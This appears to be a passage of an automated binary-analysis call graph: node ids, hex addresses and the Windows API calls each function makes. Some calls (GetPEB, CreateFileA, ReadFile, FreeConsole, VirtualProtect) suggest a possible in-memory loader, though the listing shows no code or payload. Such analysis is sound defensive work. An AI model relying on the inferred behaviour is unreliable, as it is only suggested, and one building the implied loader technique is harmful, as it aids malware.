7034ab 20757 6f76e4 __strnicoll 14 API calls 20755->20757 20756->20758 20758->20735 20762 7032ef 20761->20762 20763 70350d 20761->20763 20762->20710 20762->20712 20762->20714 20793 70356f 20763->20793 20766 70338d 20765->20766 20768 703530 20765->20768 20766->20720 20766->20728 20768->20766 20808 70a14b 20768->20808 20770 7028c2 20769->20770 20771 7028dd 20769->20771 20770->20771 20773 7028ce 20770->20773 20772 7028ec 20771->20772 20842 709a54 20771->20842 20849 7062a0 20772->20849 20775 6f76e4 __strnicoll 14 API calls 20773->20775 20777 7028d3 __fread_nolock 20775->20777 20777->20739 20861 6fd275 20778->20861 20783 70a2af 20785 6fbed7 ___free_lconv_mon 14 API calls 20783->20785 20787 70a2bb 20783->20787 20784 6fd275 39 API calls 20786 70a28c 20784->20786 20785->20787 20789 6f2a74 17 API calls 20786->20789 20788 6fbed7 ___free_lconv_mon 14 API calls 20787->20788 20790 7034a5 20787->20790 20788->20790 20791 70a299 20789->20791 20790->20754 20790->20755 20791->20783 20792 70a2a3 SetEnvironmentVariableW 20791->20792 20792->20783 20794 703582 20793->20794 20795 70357d 20793->20795 20796 6fd2b4 __Getctype 14 API calls 20794->20796 20795->20762 20797 70359f 20796->20797 20798 70360d 20797->20798 20801 703612 20797->20801 20804 6fd2b4 __Getctype 14 API calls 20797->20804 20805 6fbed7 ___free_lconv_mon 14 API calls 20797->20805 20806 6fbb4c ___std_exception_copy 29 API calls 20797->20806 20807 7035fc 20797->20807 20799 6f8353 CallUnexpected 39 API calls 20798->20799 20799->20801 20800 6fbed7 ___free_lconv_mon 14 API calls 20800->20795 20802 6f7dfc __Getctype 11 API calls 20801->20802 20803 70361e 20802->20803 20804->20797 20805->20797 20806->20797 20807->20800 20809 70a15f 20808->20809 20810 70a159 20808->20810 20809->20768 20811 70a973 20810->20811 20812 70a9bb 20810->20812 20814 70a979 20811->20814 20817 70a996 20811->20817 20824 70a9d1 20812->20824 20816 6f76e4 __strnicoll 14 API calls 20814->20816 20815 70a989 20815->20768 20818 70a97e 20816->20818 20820 6f76e4 __strnicoll 14 API calls 20817->20820 20823 70a9b4 20817->20823 20819 6f7dcf __strnicoll 29 API calls 20818->20819 20819->20815 20821 70a9a5 20820->20821 20822 6f7dcf __strnicoll 29 API calls 20821->20822 20822->20815 20823->20768 20825 70a9e1 20824->20825 20826 70a9fb 20824->20826 20827 6f76e4 __strnicoll 14 API calls 20825->20827 20828 70aa03 20826->20828 20829 70aa1a 20826->20829 20830 70a9e6 20827->20830 20831 6f76e4 __strnicoll 14 API calls 20828->20831 20832 70aa26 20829->20832 20833 70aa3d 20829->20833 20834 6f7dcf __strnicoll 29 API calls 20830->20834 20835 70aa08 20831->20835 20836 6f76e4 __strnicoll 14 API calls 20832->20836 20837 6f297a __strnicoll 39 API calls 20833->20837 20841 70a9f1 20833->20841 20834->20841 20838 6f7dcf __strnicoll 29 API calls 20835->20838 20839 70aa2b 20836->20839 20837->20841 20838->20841 20840 6f7dcf __strnicoll 29 API calls 20839->20840 20840->20841 20841->20815 20843 709a74 HeapSize 20842->20843 20844 709a5f 20842->20844 20843->20772 20845 6f76e4 __strnicoll 14 API calls 20844->20845 20846 709a64 20845->20846 20847 6f7dcf __strnicoll 29 API calls 20846->20847 20848 709a6f 20847->20848 20848->20772 20850 7062b8 20849->20850 20851 7062ad 20849->20851 20853 7062c0 20850->20853 20859 7062c9 __Getctype 20850->20859 20852 6fbf11 __fread_nolock 15 API calls 20851->20852 20857 7062b5 20852->20857 20854 6fbed7 ___free_lconv_mon 14 API calls 20853->20854 20854->20857 20855 7062f3 HeapReAlloc 20855->20857 20855->20859 20856 7062ce 20858 6f76e4 __strnicoll 14 API calls 20856->20858 20857->20777 20858->20857 20859->20855 20859->20856 20860 6f5877 std::ios_base::_Init 2 API calls 20859->20860 20860->20859 20862 6f297a __strnicoll 39 API calls 20861->20862 20863 6fd287 20862->20863 20864 6fd299 20863->20864 20869 6fca46 20863->20869 20866 6f2a74 20864->20866 20875 6f2acc 20866->20875 20872 6fd05b 20869->20872 20873 6fcfd6 std::_Lockit::_Lockit 5 API calls 20872->20873 20874 6fca4e 20873->20874 20874->20864 20876 6f2ada 20875->20876 20877 6f2af4 20875->20877 20893 6f2a5a 20876->20893 20879 6f2b1a 20877->20879 20881 6f2afb 20877->20881 20880 6fbf5f __fread_nolock MultiByteToWideChar 20879->20880 20882 6f2b29 20880->20882 20885 6f2a8c 20881->20885 20897 6f2a1b 20881->20897 20884 6f2b30 GetLastError 20882->20884 20887 6f2b56 20882->20887 20889 6f2a1b 15 API calls 20882->20889 20902 6f770a 20884->20902 20885->20783 20885->20784 20887->20885 20890 6fbf5f __fread_nolock MultiByteToWideChar 20887->20890 20889->20887 20892 6f2b6d 20890->20892 20892->20884 20892->20885 20894 6f2a65 20893->20894 20895 6f2a6d 20893->20895 20896 6fbed7 ___free_lconv_mon 14 API calls 20894->20896 20895->20885 20896->20895 20898 6f2a5a 14 API calls 20897->20898 20899 6f2a29 20898->20899 20907 6f29fc 20899->20907 20910 6f76f7 20902->20910 20908 6fbf11 __fread_nolock 15 API calls 20907->20908 20909 6f2a09 20908->20909 20909->20885 20911 6fc2bb __strnicoll 14 API calls 20910->20911 20914 6ea668 _Yarn 20913->20914 20915 6e24f3 20914->20915 20916 6f5877 std::ios_base::_Init 2 API calls 20914->20916 20917 6ea684 20914->20917 20924 6f5349 20915->20924 20916->20914 20918 6ef338 std::ios_base::_Init 20917->20918 20919 6ea68e Concurrency::cancel_current_task 20917->20919 20920 6f060c CallUnexpected RaiseException 20918->20920 20951 6f060c 20919->20951 20921 6ef354 20920->20921 20923 6eb4ce 20925 6f536a 20924->20925 20926 6f5356 20924->20926 20954 6f53da 20925->20954 20928 6f76e4 __strnicoll 14 API calls 20926->20928 20930 6f535b 20928->20930 20931 6f7dcf __strnicoll 29 API calls 20930->20931 20933 6f5366 20931->20933 20932 6f537f CreateThread 20934 6f539e GetLastError 20932->20934 20935 6f53aa 20932->20935 20971 6f5470 20932->20971 20933->20131 20936 6f770a __dosmaperr 14 API calls 20934->20936 20963 6f542a 20935->20963 20936->20935 20940 6e253a 20939->20940 20941 6ef134 20939->20941 20940->20142 20940->20144 20942 6ef13b GetExitCodeThread 20941->20942 20943 6ef151 CloseHandle 20941->20943 20942->20940 20944 6ef14c 20942->20944 20943->20940 20944->20943 20946 6eb32d std::_Throw_Cpp_error 20945->20946 21010 6eb352 20946->21010 20952 6f0626 20951->20952 20953 6f0654 RaiseException 20951->20953 20952->20953 20953->20923 20955 6fd2b4 __Getctype 14 API calls 20954->20955 20956 6f53eb 20955->20956 20957 6fbed7 ___free_lconv_mon 14 API calls 20956->20957 20958 6f53f8 20957->20958 20959 6f53ff GetModuleHandleExW 20958->20959 20960 6f541c 20958->20960 20959->20960 20961 6f542a 16 API calls 20960->20961 20962 6f5376 20961->20962 20962->20932 20962->20935 20964 6f5436 20963->20964 20970 6f53b5 20963->20970 20965 6f543c CloseHandle 20964->20965 20966 6f5445 20964->20966 20965->20966 20967 6f544b FreeLibrary 20966->20967 20968 6f5454 20966->20968 20967->20968 20969 6fbed7 ___free_lconv_mon 14 API calls 20968->20969 20969->20970 20970->20131 20972 6f547c ___scrt_is_nonwritable_in_current_image 20971->20972 20973 6f5483 GetLastError ExitThread 20972->20973 20974 6f5490 20972->20974 20975 6fc16a __Getctype 39 API calls 20974->20975 20976 6f5495 20975->20976 20985 6ff767 20976->20985 20979 6f54ac 20989 6f53cc 20979->20989 20986 6ff777 CallUnexpected 20985->20986 20987 6f54a0 20985->20987 20986->20987 20995 6fce89 20986->20995 20987->20979 20992 6fcde0 20987->20992 20998 6f54ee 20989->20998 20993 6fcfd6 std::_Lockit::_Lockit 5 API calls 20992->20993 20994 6fcdfc 20993->20994 20994->20979 20996 6fcfd6 std::_Lockit::_Lockit 5 API calls 20995->20996 20997 6fcea5 20996->20997 20997->20987 20999 6fc2bb __strnicoll 14 API calls 20998->20999 21001 6f54f9 20999->21001 21000 6f553b ExitThread 21001->21000 21002 6f5512 21001->21002 21007 6fce1b 21001->21007 21004 6f5525 21002->21004 21005 6f551e CloseHandle 21002->21005 21004->21000 21006 6f5531 FreeLibraryAndExitThread 21004->21006 21005->21004 21006->21000 21008 6fcfd6 std::_Lockit::_Lockit 5 API calls 21007->21008 21009 6fce34 21008->21009 21009->21002 21011 6eb35e __EH_prolog3_GS 21010->21011 21018 6eb281 21011->21018 21015 6eb387 std::_Throw_Cpp_error 21039 6efb97 21015->21039 21019 6eb29e 21018->21019 21019->21019 21042 6eb39f 21019->21042 21021 6eb2b2 21022 6e3430 21021->21022 21023 6e345e 21022->21023 21024 6e358b 21023->21024 21025 6e3468 21023->21025 21026 6e2600 std::_Throw_Cpp_error 30 API calls 21024->21026 21027 6e3470 codecvt 21025->21027 21028 6e34bd 21025->21028 21029 6e34a4 21025->21029 21037 6e3530 21026->21037 21086 6e35a0 21027->21086 21030 6ea663 std::ios_base::_Init 3 API calls 21028->21030 21033 6ea663 std::ios_base::_Init 3 API calls 21029->21033 21030->21027 21033->21027 21035 6e34f9 21036 6f0bf6 ___std_exception_copy 29 API calls 21035->21036 21036->21037 21038 6e355c std::ios_base::_Ios_base_dtor 21037->21038 21097 6f7ddf 21037->21097 21038->21015 21040 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21039->21040 21041 6efba1 21040->21041 21041->21041 21043 6eb417 21042->21043 21046 6eb3b6 std::_Throw_Cpp_error 21042->21046 21057 6e2600 21043->21057 21048 6eb3bd std::_Throw_Cpp_error codecvt 21046->21048 21049 6eb449 21046->21049 21048->21021 21050 6eb455 21049->21050 21051 6eb453 21049->21051 21052 6eb45d 21050->21052 21053 6eb464 21050->21053 21051->21048 21060 6eb46c 21052->21060 21054 6ea663 std::ios_base::_Init 3 API calls 21053->21054 21056 6eb462 21054->21056 21056->21048 21075 6eb4cf 21057->21075 21061 6eb47d 21060->21061 21062 6e2610 21060->21062 21063 6ea663 std::ios_base::_Init 3 API calls 21061->21063 21064 6f060c CallUnexpected RaiseException 21062->21064 21065 6eb483 21063->21065 21066 6e2642 21064->21066 21065->21056 21069 6f0bf6 21066->21069 21070 6f0c03 _Yarn 21069->21070 21074 6e2678 21069->21074 21071 6f0c30 21070->21071 21072 6fbb4c ___std_exception_copy 29 API calls 21070->21072 21070->21074 21073 6f92d7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 21071->21073 21072->21071 21073->21074 21074->21056 21080 6eb59a 21075->21080 21078 6f060c CallUnexpected RaiseException 21079 6eb4ee 21078->21079 21083 6eb14d 21080->21083 21084 6f0bf6 ___std_exception_copy 29 API calls 21083->21084 21085 6eb179 21084->21085 21085->21078 21087 6e35dd 21086->21087 21089 6e361a 21086->21089 21087->21089 21102 6e3790 21087->21102 21090 6e3790 std::_Throw_Cpp_error 30 API calls 21089->21090 21091 6e36b0 codecvt 21089->21091 21090->21091 21092 6e36fc std::ios_base::_Ios_base_dtor 21091->21092 21093 6f7ddf std::_Throw_Cpp_error 29 API calls 21091->21093 21092->21035 21094 6e374a 21093->21094 21116 6e1460 21094->21116 21096 6e375f 21096->21035 21098 6f801e __strnicoll 29 API calls 21097->21098 21099 6f7dee 21098->21099 21100 6f7dfc __Getctype 11 API calls 21099->21100 21101 6f7dfb 21100->21101 21103 6e38d5 21102->21103 21108 6e37ad 21102->21108 21104 6e2600 std::_Throw_Cpp_error 30 API calls 21103->21104 21114 6e37dc codecvt 21104->21114 21105 6e37d1 21106 6ea663 std::ios_base::_Init 3 API calls 21105->21106 21106->21114 21107 6f7ddf std::_Throw_Cpp_error 29 API calls 21109 6e38df 21107->21109 21108->21105 21110 6e38c1 21108->21110 21112 6e38bc 21108->21112 21108->21114 21113 6ea663 std::ios_base::_Init 3 API calls 21110->21113 21111 6e3841 std::ios_base::_Ios_base_dtor codecvt 21111->21089 21120 6e2610 21112->21120 21113->21114 21114->21107 21114->21111 21117 6e1486 std::ios_base::_Ios_base_dtor 21116->21117 21118 6e146c 21116->21118 21117->21096 21118->21117 21119 6f7ddf std::_Throw_Cpp_error 29 API calls 21118->21119 21119->21118 21121 6f060c CallUnexpected RaiseException 21120->21121 21122 6e2642 21121->21122 21123 6f0bf6 ___std_exception_copy 29 API calls 21122->21123 21124 6e2678 21123->21124 21124->21110 21126 6f56cf 21125->21126 21127 6f56bd 21125->21127 21137 6f582a 21126->21137 21129 6ef896 CallUnexpected GetModuleHandleW 21127->21129 21131 6f56c2 21129->21131 21131->21126 21152 6f55c4 GetModuleHandleExW 21131->21152 21132 6f048b 21132->20171 21138 6f5836 ___scrt_is_nonwritable_in_current_image 21137->21138 21158 6f80e1 EnterCriticalSection 21138->21158 21140 6f5840 21159 6f5727 21140->21159 21142 6f584d 21163 6f586b 21142->21163 21145 6f565f 21188 6f5646 21145->21188 21147 6f5669 21148 6f567d 21147->21148 21149 6f566d GetCurrentProcess TerminateProcess 21147->21149 21150 6f55c4 CallUnexpected 3 API calls 21148->21150 21149->21148 21151 6f5685 ExitProcess 21150->21151 21153 6f5624 21152->21153 21154 6f5603 GetProcAddress 21152->21154 21155 6f562a FreeLibrary 21153->21155 21156 6f5633 21153->21156 21154->21153 21157 6f5617 21154->21157 21155->21156 21156->21126 21157->21153 21158->21140 21160 6f5733 ___scrt_is_nonwritable_in_current_image CallUnexpected 21159->21160 21162 6f5797 CallUnexpected 21160->21162 21166 6f73fe 21160->21166 21162->21142 21187 6f80f8 LeaveCriticalSection 21163->21187 21165 6f5706 21165->21132 21165->21145 21167 6f740a __EH_prolog3 21166->21167 21170 6f7689 21167->21170 21169 6f7431 Concurrency::details::_ContextCallback::_CallInContext 21169->21162 21171 6f7695 ___scrt_is_nonwritable_in_current_image 21170->21171 21178 6f80e1 EnterCriticalSection 21171->21178 21173 6f76a3 21179 6f7554 21173->21179 21178->21173 21180 6f7573 21179->21180 21181 6f756b 21179->21181 21180->21181 21182 6fbed7 ___free_lconv_mon 14 API calls 21180->21182 21183 6f76d8 21181->21183 21182->21181 21186 6f80f8 LeaveCriticalSection 21183->21186 21185 6f76c1 21185->21169 21186->21185 21187->21165 21191 6ff740 21188->21191 21190 6f564b CallUnexpected 21190->21147 21192 6ff74f CallUnexpected 21191->21192 21193 6ff75c 21192->21193 21195 6fce49 21192->21195 21193->21190 21196 6fcfd6 std::_Lockit::_Lockit 5 API calls 21195->21196 21197 6fce65 21196->21197 21197->21193 21200 6f324d 21198->21200 21201 6f325f ___scrt_uninitialize_crt 21198->21201 21199 6f325b 21199->20164 21200->21199 21203 6f854a 21200->21203 21201->20164 21206 6f8675 21203->21206 21209 6f874e 21206->21209 21210 6f875a ___scrt_is_nonwritable_in_current_image 21209->21210 21217 6f80e1 EnterCriticalSection 21210->21217 21212 6f87d0 21226 6f87ee 21212->21226 21215 6f8764 ___scrt_uninitialize_crt 21215->21212 21218 6f86c2 21215->21218 21217->21215 21219 6f86ce ___scrt_is_nonwritable_in_current_image 21218->21219 21229 6f3315 EnterCriticalSection 21219->21229 21221 6f86d8 ___scrt_uninitialize_crt 21225 6f8711 21221->21225 21230 6f8553 21221->21230 21241 6f8742 21225->21241 21342 6f80f8 LeaveCriticalSection 21226->21342 21228 6f8551 21228->21199 21229->21221 21231 6f8568 _Fputc 21230->21231 21232 6f856f 21231->21232 21233 6f857a 21231->21233 21234 6f8675 ___scrt_uninitialize_crt 68 API calls 21232->21234 21244 6f85b8 21233->21244 21341 6f3329 LeaveCriticalSection 21241->21341 21243 6f8730 21243->21215 21341->21243 21342->21228 21343 6eb060 21366 6eafc4 GetModuleHandleExW 21343->21366 21346 6eb0a6 21348 6eafc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21346->21348 21350 6eb0ac 21348->21350 21352 6eb0cd 21350->21352 21383 6eafa7 GetModuleHandleExW 21350->21383 21368 6e7770 21352->21368 21354 6eb0bd 21354->21352 21355 6eb0c3 FreeLibraryWhenCallbackReturns 21354->21355 21355->21352 21356 6eb0dd 21357 6eafc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21356->21357 21358 6eb0e3 21357->21358 21359 6eb111 21358->21359 21360 6eaefa 37 API calls 21358->21360 21361 6eb0ef 21360->21361 21362 6eefd2 ReleaseSRWLockExclusive 21361->21362 21363 6eb102 21362->21363 21363->21359 21384 6ee95d WakeAllConditionVariable 21363->21384 21367 6eafda 21366->21367 21367->21346 21374 6eaefa 21367->21374 21369 6e77af 21368->21369 21385 6e8aa0 21369->21385 21370 6e77b9 21390 6eaf64 21370->21390 21372 6e77cb 21372->21356 21375 6eefc1 12 API calls 21374->21375 21376 6eaf03 21375->21376 21377 6eb317 std::_Throw_Cpp_error 30 API calls 21376->21377 21378 6eaf17 21376->21378 21379 6eaf20 21377->21379 21380 6eefd2 21378->21380 21381 6eefdf ReleaseSRWLockExclusive 21380->21381 21382 6eefed 21380->21382 21381->21382 21382->21346 21383->21354 21384->21359 21386 6e8add 21385->21386 21387 6e8ae8 21386->21387 21393 6e90e0 21386->21393 21410 6e90f0 21386->21410 21387->21370 21391 6eaf7b 21390->21391 21392 6eaf70 CloseThreadpoolWork 21390->21392 21391->21372 21392->21391 21394 6e90ea 21393->21394 21426 6eefc1 21394->21426 21397 6e9136 21399 6e91ce 21397->21399 21400 6e9143 21397->21400 21398 6e91c7 21401 6eb317 std::_Throw_Cpp_error 30 API calls 21398->21401 21404 6eb317 std::_Throw_Cpp_error 30 API calls 21399->21404 21402 6e914b 21400->21402 21403 6e9174 21400->21403 21401->21399 21405 6eefd2 ReleaseSRWLockExclusive 21402->21405 21407 6eefd2 ReleaseSRWLockExclusive 21403->21407 21406 6e9151 std::_Throw_Cpp_error 21404->21406 21405->21406 21406->21387 21408 6e9181 21407->21408 21429 6e92f0 21408->21429 21411 6eefc1 12 API calls 21410->21411 21412 6e912b 21411->21412 21413 6e9136 21412->21413 21414 6e91c7 21412->21414 21415 6e91ce 21413->21415 21416 6e9143 21413->21416 21417 6eb317 std::_Throw_Cpp_error 30 API calls 21414->21417 21420 6eb317 std::_Throw_Cpp_error 30 API calls 21415->21420 21418 6e914b 21416->21418 21419 6e9174 21416->21419 21417->21415 21421 6eefd2 ReleaseSRWLockExclusive 21418->21421 21423 6eefd2 ReleaseSRWLockExclusive 21419->21423 21422 6e9151 std::_Throw_Cpp_error 21420->21422 21421->21422 21422->21387 21424 6e9181 21423->21424 21425 6e92f0 66 API calls 21424->21425 21425->21422 21436 6eeff1 GetCurrentThreadId 21426->21436 21462 6e9620 21429->21462 21433 6e939f 21471 6e9400 21433->21471 21437 6ef03a 21436->21437 21438 6ef01b 21436->21438 21440 6ef05a 21437->21440 21441 6ef043 21437->21441 21439 6ef020 AcquireSRWLockExclusive 21438->21439 21447 6ef030 21438->21447 21439->21447 21443 6ef0b9 21440->21443 21449 6ef072 21440->21449 21442 6ef04e AcquireSRWLockExclusive 21441->21442 21441->21447 21442->21447 21445 6ef0c0 TryAcquireSRWLockExclusive 21443->21445 21443->21447 21444 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21446 6e912b 21444->21446 21445->21447 21446->21397 21446->21398 21447->21444 21449->21447 21450 6ef0a9 TryAcquireSRWLockExclusive 21449->21450 21451 6efdcd 21449->21451 21450->21447 21450->21449 21454 6efda6 21451->21454 21453 6efdd8 __aulldiv __aullrem 21453->21449 21457 6f00b4 21454->21457 21458 6f00e4 GetSystemTimePreciseAsFileTime 21457->21458 21459 6f00f0 GetSystemTimeAsFileTime 21457->21459 21460 6efdb4 21458->21460 21459->21460 21460->21453 21463 6e9667 21462->21463 21464 6ea663 std::ios_base::_Init 3 API calls 21463->21464 21465 6e935f 21464->21465 21466 6e94f0 21465->21466 21467 6e9536 std::_Throw_Cpp_error 21466->21467 21470 6e9540 std::_Throw_Cpp_error 21467->21470 21496 6eb57d 21467->21496 21470->21433 21472 6eefc1 12 API calls 21471->21472 21473 6e9418 21472->21473 21474 6e94c6 21473->21474 21475 6e94cd 21473->21475 21477 6e9438 21473->21477 21478 6e9443 21473->21478 21476 6eb317 std::_Throw_Cpp_error 30 API calls 21474->21476 21479 6eb317 std::_Throw_Cpp_error 30 API calls 21475->21479 21476->21475 21480 6eefd2 ReleaseSRWLockExclusive 21477->21480 21481 6eefd2 ReleaseSRWLockExclusive 21478->21481 21482 6e94db 21479->21482 21483 6e93ae 21480->21483 21484 6e9450 21481->21484 21485 6eb317 std::_Throw_Cpp_error 30 API calls 21482->21485 21483->21406 21486 6eefc1 12 API calls 21484->21486 21487 6e94ec 21485->21487 21488 6e945c 21486->21488 21488->21474 21489 6e9463 21488->21489 21489->21482 21490 6e946f 21489->21490 21500 6ee95d WakeAllConditionVariable 21490->21500 21492 6e948b 21493 6eefd2 ReleaseSRWLockExclusive 21492->21493 21494 6e9494 21493->21494 21494->21483 21501 6e7a10 21494->21501 21497 6eb58b Concurrency::cancel_current_task 21496->21497 21498 6f060c CallUnexpected RaiseException 21497->21498 21499 6eb599 21498->21499 21500->21492 21502 6e7a4f 21501->21502 21504 6e7a75 21502->21504 21505 6e7b60 21502->21505 21504->21494 21506 6e7ba7 21505->21506 21507 6e7bc5 21506->21507 21508 6e7bb0 21506->21508 21514 6e8970 21507->21514 21510 6ea663 std::ios_base::_Init 3 API calls 21508->21510 21511 6e7c00 21510->21511 21527 6e73e0 21511->21527 21513 6e7bd9 21513->21504 21515 6e89a9 21514->21515 21520 6e89b0 21514->21520 21516 6ea663 std::ios_base::_Init 3 API calls 21515->21516 21515->21520 21517 6e8a05 21516->21517 21542 6eaf37 CreateThreadpoolWork 21517->21542 21520->21513 21528 6e744d 21527->21528 21529 6e7419 21527->21529 21528->21513 21561 6e7690 21529->21561 21543 6eaf5c GetLastError 21542->21543 21544 6eaf52 21542->21544 21555 6eaf7e 21544->21555 21574 6ef31f InitOnceBeginInitialize 21561->21574 21575 6e98f0 21576 6e990f 21575->21576 21577 6e98f9 21575->21577 21578 6eb57d Concurrency::cancel_current_task RaiseException 21576->21578 21582 6e2270 GetModuleHandleA GetModuleFileNameW 21577->21582 21579 6e9914 21578->21579 21589 6fa89a 21582->21589 21584 6e22b0 21593 6e1fb0 GetPEB 21584->21593 21586 6e22b9 21587 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21586->21587 21588 6e22ca 21587->21588 21590 6fa8ad _Fputc 21589->21590 21616 6fa90f 21590->21616 21592 6fa8bf _Fputc 21592->21584 21658 6e1240 21593->21658 21595 6e2009 CreateFileA 21597 6e2225 21595->21597 21598 6e2041 GetFileSize 21595->21598 21597->21586 21599 6e21fc CloseHandle 21598->21599 21600 6e2055 21598->21600 21599->21597 21601 6e205d ReadFile 21600->21601 21602 6e2079 CloseHandle 21601->21602 21603 6e21f3 21601->21603 21604 6e2205 21602->21604 21609 6e2090 std::ios_base::_Ios_base_dtor codecvt _strlen 21602->21609 21603->21599 21670 6e1ef0 21604->21670 21606 6e223b 21607 6e2600 std::_Throw_Cpp_error 30 API calls 21606->21607 21608 6e2247 21607->21608 21610 6f7ddf std::_Throw_Cpp_error 29 API calls 21608->21610 21609->21604 21609->21606 21609->21608 21611 6ea663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 21609->21611 21683 6e1000 21609->21683 21612 6e224c 21610->21612 21611->21609 21613 6e1460 std::_Throw_Cpp_error 29 API calls 21612->21613 21615 6e225f 21613->21615 21615->21586 21617 6fa93f 21616->21617 21618 6fa94e 21617->21618 21619 6fa96c 21617->21619 21630 6fa943 21617->21630 21620 6f7f78 _Fputc 29 API calls 21618->21620 21621 6fa979 21619->21621 21640 6f3790 21619->21640 21620->21630 21622 6fa993 21621->21622 21623 6fa9b1 21621->21623 21646 7066fb 21622->21646 21627 6fa9c5 21623->21627 21628 6fab41 21623->21628 21624 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21629 6fabb4 21624->21629 21627->21630 21632 6faa5f 21627->21632 21636 6faa09 21627->21636 21628->21630 21631 6fc021 _Fputc WideCharToMultiByte 21628->21631 21629->21592 21630->21624 21631->21630 21633 6fc021 _Fputc WideCharToMultiByte 21632->21633 21635 6faa72 21633->21635 21634 6fc021 _Fputc WideCharToMultiByte 21634->21630 21635->21630 21637 6faa8b GetLastError 21635->21637 21636->21634 21637->21630 21638 6faa9a 21637->21638 21638->21630 21639 6fc021 _Fputc WideCharToMultiByte 21638->21639 21639->21638 21641 6f37a0 21640->21641 21650 6fc7a8 21641->21650 21649 706732 std::_Locinfo::_Locinfo_dtor codecvt 21646->21649 21647 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21648 706808 21647->21648 21648->21630 21649->21647 21651 6fc7bf 21650->21651 21652 6f37bd 21650->21652 21651->21652 21653 7008a5 __Getctype 39 API calls 21651->21653 21654 6fc7d9 21652->21654 21653->21652 21655 6fc7f0 21654->21655 21657 6f37ca 21654->21657 21656 6fdb02 __strnicoll 39 API calls 21655->21656 21655->21657 21656->21657 21657->21621 21668 6e1283 std::ios_base::_Ios_base_dtor codecvt _strlen 21658->21668 21669 6e1402 21658->21669 21659 6e1422 21660 6e2600 std::_Throw_Cpp_error 30 API calls 21659->21660 21661 6e142e 21660->21661 21663 6f7ddf std::_Throw_Cpp_error 29 API calls 21661->21663 21662 6ea663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 21662->21668 21664 6e1433 21663->21664 21666 6e1460 std::_Throw_Cpp_error 29 API calls 21664->21666 21665 6e1000 102 API calls 21665->21668 21667 6e144f 21666->21667 21667->21595 21668->21659 21668->21661 21668->21662 21668->21665 21668->21669 21669->21595 21671 6e1240 102 API calls 21670->21671 21672 6e1f18 FreeConsole 21671->21672 21689 6e14b0 21672->21689 21674 6e1f39 21675 6e14b0 103 API calls 21674->21675 21676 6e1f4a 21675->21676 21677 6e1240 102 API calls 21676->21677 21678 6e1f5d VirtualProtect 21677->21678 21680 6e1f7e 21678->21680 21681 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21680->21681 21682 6e1fa3 21681->21682 21682->21597 21684 6e1013 21683->21684 22148 6e2750 21684->22148 21693 6e14f0 21689->21693 21694 6e16dd 21693->21694 21695 6e1702 std::ios_base::_Ios_base_dtor 21693->21695 21699 6e4320 21693->21699 21712 6e1750 21693->21712 21726 6e1d10 21693->21726 21694->21695 21696 6f7ddf std::_Throw_Cpp_error 29 API calls 21694->21696 21695->21674 21697 6e1725 21696->21697 21734 6e1ea0 21697->21734 21700 6e444e 21699->21700 21701 6e4364 21699->21701 21702 6e2610 std::_Throw_Cpp_error 30 API calls 21700->21702 21703 6e437e 21701->21703 21704 6e43a5 21701->21704 21708 6e4393 codecvt 21701->21708 21702->21708 21703->21700 21705 6e438a 21703->21705 21706 6ea663 std::ios_base::_Init 3 API calls 21704->21706 21709 6ea663 std::ios_base::_Init 3 API calls 21705->21709 21706->21708 21707 6f7ddf std::_Throw_Cpp_error 29 API calls 21710 6e4458 21707->21710 21708->21707 21711 6e4424 std::ios_base::_Ios_base_dtor 21708->21711 21709->21708 21711->21693 21713 6e1788 _strlen 21712->21713 21716 6e1833 21713->21716 21723 6e180d 21713->21723 21765 6e2c50 21713->21765 21716->21723 21739 6e4460 21716->21739 21718 6e1b9f 21718->21693 21719 6e1b8e 21719->21718 21775 6e38e0 21719->21775 21721 6f060c CallUnexpected RaiseException 21721->21723 21723->21719 21723->21721 21783 6e2f00 21723->21783 21791 6e32c0 21723->21791 21724 6e188d 21724->21723 21756 6edef0 21724->21756 21727 6e1d5c 21726->21727 21728 6e4460 67 API calls 21727->21728 21729 6e1d70 21728->21729 22138 6e4b10 21729->22138 21732 6e2c50 39 API calls 21733 6e1deb 21732->21733 21733->21693 21735 6e1ea9 21734->21735 21736 6e1ec2 std::ios_base::_Ios_base_dtor 21734->21736 21735->21736 21737 6f7ddf std::_Throw_Cpp_error 29 API calls 21735->21737 21738 6e1eec 21737->21738 21808 6ea9f4 21739->21808 21742 6ea9f4 std::_Lockit::_Lockit 7 API calls 21744 6e44b7 21742->21744 21743 6e4556 21745 6eaa25 std::_Lockit::~_Lockit 2 API calls 21743->21745 21814 6eaa25 21744->21814 21747 6e4585 21745->21747 21746 6e44d8 21746->21743 21821 6e45f0 21746->21821 21747->21724 21751 6e4598 21838 6e3e50 21751->21838 21752 6e4543 21833 6eab43 21752->21833 21760 6edf1e 21756->21760 21764 6edf17 21756->21764 21757 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21758 6ee01c 21757->21758 21758->21724 21761 6edfd0 21760->21761 21762 6edf69 21760->21762 21760->21764 21761->21764 22029 6f932d 21761->22029 21762->21764 22026 6edada 21762->22026 21764->21757 21766 6e2d5a 21765->21766 21767 6e2c90 21765->21767 21766->21716 21768 6e2c50 39 API calls 21767->21768 21769 6e2cb3 21767->21769 21773 6e2cd7 21767->21773 21768->21773 21769->21766 21770 6e38e0 39 API calls 21769->21770 21770->21766 21771 6e2f00 std::ios_base::_Init 38 API calls 21771->21773 21772 6e32c0 std::ios_base::_Init 30 API calls 21772->21773 21773->21769 21773->21771 21773->21772 21774 6f060c CallUnexpected RaiseException 21773->21774 21774->21773 21776 6e3919 21775->21776 21782 6e3962 21775->21782 21777 6e2f00 std::ios_base::_Init 38 API calls 21776->21777 21776->21782 21778 6e3998 21777->21778 21779 6e32c0 std::ios_base::_Init 30 API calls 21778->21779 21780 6e39aa 21779->21780 21781 6f060c CallUnexpected RaiseException 21780->21781 21781->21782 21782->21718 21784 6e2f34 21783->21784 